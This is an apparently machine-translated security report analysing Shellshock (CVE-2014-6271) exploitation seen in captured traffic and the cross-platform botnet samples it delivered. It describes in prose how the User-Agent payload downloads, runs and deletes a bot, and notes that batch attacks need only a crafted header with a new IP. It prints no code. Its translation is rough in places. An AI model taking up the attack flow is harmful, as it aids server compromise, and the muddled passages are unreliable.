Comprehensive Analysis of Shell-breaking vulnerabilities (CVE-2014-6271): the second part of the vulnerability Series

Comprehensive Analysis of Shell-breaking vulnerabilities (CVE-2014-6271): the second part of the vulnerability Series

I. Overview of "Shell Cracking" Vulnerabilities

Our team released the "shell-breaking Vulnerability (CVE-2014-6271) Comprehensive Analysis" on September 25 and updated multiple versions. In this process, our monitoring collection and sample exchange system found a large number of attacks such as scanning and backdoor serving using the vulnerability, and found multiple malicious code related to the vulnerability.

Ii. Network Data Packets

Based on the vulnerability features, we used the "cloud probe" system jointly deployed with colleges and universities to monitor traffic. Some network attack behaviors are captured. The following describes an attack package:

 

We can see from the packet information:

 

The main attack load is located in the User-Agent information, due to the vulnerability exploitation principle in the "shell" Vulnerability (CVE-2014-6271) comprehensive analysis has been analyzed, we will not go into details. From the attack load, we can see that download regular. the bot file is named sh in the/tmp directory, runs the file, downloads other malicious code files, and deletes the file.

THE sh files used for attacks and the malicious code files downloaded again are targeted at Linux, Unix, Mac OS, and other target systems. The formats are ELF files, perl, and bash scripts.

The spread of the vulnerability in CGI-BASH is very good, a few scripts can be completed, the core is to use the constructed Http header, for different IP detection, you only need to replace the IP address in the Host information.

Iii. Malicious Code

3.1 malicious code information

1. malicious code information:

 

2. Sample Analysis card

 

 

 

 

3.2 malicious code Process Analysis

A large number of attack packets were captured by the CERT "cloud probing" system and the deployed VDS network virus monitoring devices. Through the extraction of attack loads, it is found that there are a large number of automatic duplicate loads. For example, the load in the data packet in Chapter 2 has a large number of repeated deliveries. In this way, batch attacks can be implemented. The following uses the Attack Process of the data packets listed in Chapter 2 as an example to analyze the attack and the job process of using the relevant samples. Figure 3-1 shows that the four samples are all botnets, And the attacker delivers the same source program files compiled in different operating systems and operating environments, to infect Linux, Mac, and related systems that support the gcc or Perl environment.

 

Figure 3? 1. Vulnerability and sample job flowchart

Iv. Malicious Code Similarity Analysis

In order to adapt to the 32-bit and 64-bit structures, both versions of the operating system can run. attackers have compiled the same source code multiple times. In order to avoid detection and removal of anti-virus software, attackers also make simple obfuscation. However, no matter how different versions are compiled or obfuscated, attackers can still find the commonalities of program files based on the same source code. These commonalities facilitate us to determine the similarities. As shown in Figure 4-1, we found that the six "shells" serving bots in two different events are consistent.

 

Figure 4? 1 malicious code Similarity Analysis

5. Walk out of the worm zone (generation summary)

We pointed out in the "shell-breaking" Vulnerability (CVE-2014-6271) Comprehensive Analysis (one of the "shell-breaking" trilogy) report that the "shell-breaking" Vulnerability "is easy to use to write worms for automatic propagation, it will also lead to the development of botnets ". Over the past few years,Although the number of worms we capture continues to grow, the truly influential worms are rare. But today, we see the familiar and unfamiliar opponent "worm", and let it go with the help of the "shell" vulnerability.If the development of technology is a rising spiral, and it will show "high-order repetition" at a certain time point, why not the evolution of threats?

Anti-Virus workers and Anti-Virus products have made many attempts to eliminate worms, but the major reason for the decrease in worms is the change in the ecosystem. The Windows system controls the external calls of Outlook, severely cracking the spread of email worms. The introduction of DEP, ASLR, UAC, and other mechanisms greatly reduces the spread of scanning overflow worms; the control of automatic playback reduces the spread of USB flash drives. From another perspective, with the trend of privacy and attack targeting of vulnerabilities, vulnerabilities with the value of writing worms are hidden by attackers and used with caution. At the same time, some botnet controllers gradually changed the use of worms to other methods such as bundling and FAKEAV.

About "heart bleeding" is three years the most serious vulnerability qualitative after half a year, "shell" vulnerabilities suddenly exposed, but a few days: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277 followed. The disclosure of severe vulnerabilities often has a demonstration and comparison effect, which is the cause of the "coming together" that we can think of for the time being. Each earthquake has a chain of aftershocks, followed by Crow's days.

At the same time, looking at Linux/MacOS from the perspective of a security team who is more familiar with Windows will undoubtedly have a lot of problems. recompilation will bring about a lot of changes, and a lot of versions will bring about fragmentation, it brings a lot of uncertainty to patching. The built-in compilers and rich scripts are both the stage for programmers and the soil for attackers. We often see BAT and VBS scripts in Windows attacks, but they are usually supporting roles rather than functional subjects of malicious code. Unless the target is code contamination, it is rare to drop a piece of C ++ source code or project into a scenario where attackers can compile it. The gcc source code and perl script in this report have completely different values, and this mode is no stranger in the past and in the future. This method not only meets the characteristics of the scenario, but also is a lightweight "Kill-free ". In the future, Linux/MacOS will be an important battlefield for attack and defense, although the shell and obfuscation tools of malicious code are as simple and naive as a large number of underground shells and commercial shells in Windows, but everything has already started.

I would like to dedicate our work to our family, our comrades-in-arms, and our motherland.

 

 

Appendix: References

CERT laboratory: Comprehensive Analysis of Shell-breaking Vulnerability (CVE-2014-6271)

Http://www.antiy.com/response/CVE-2014-6271.html

[2] know chuangyu: ShellShock emergency Summary

Http://blog.knownsec.com/2014/09/shellshock_response_profile/

[3] know chuangyu: Bash 3.0-4.3 Command Execution Vulnerability Analysis

Http://blog.knownsec.com/2014/09/bash_3-0-4-3-command-exec-analysis/

[4] First Shellshock botnet attacksAkamai US DoD networks

Http://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx

[5] Linux ELF bash 0day (shellshock): The fun has only just begun...

Http://blog.malwaremustdie.org/2014/09/linux-elf-bash-0day-fun-has-only-just.html

[6] Cert lab: "step out of the worms and Trojans" second of AVER reflection trilogy"

Http://www.antiy.com/presentation/Methodology_AVER_Introspection_Trilogy_II.htm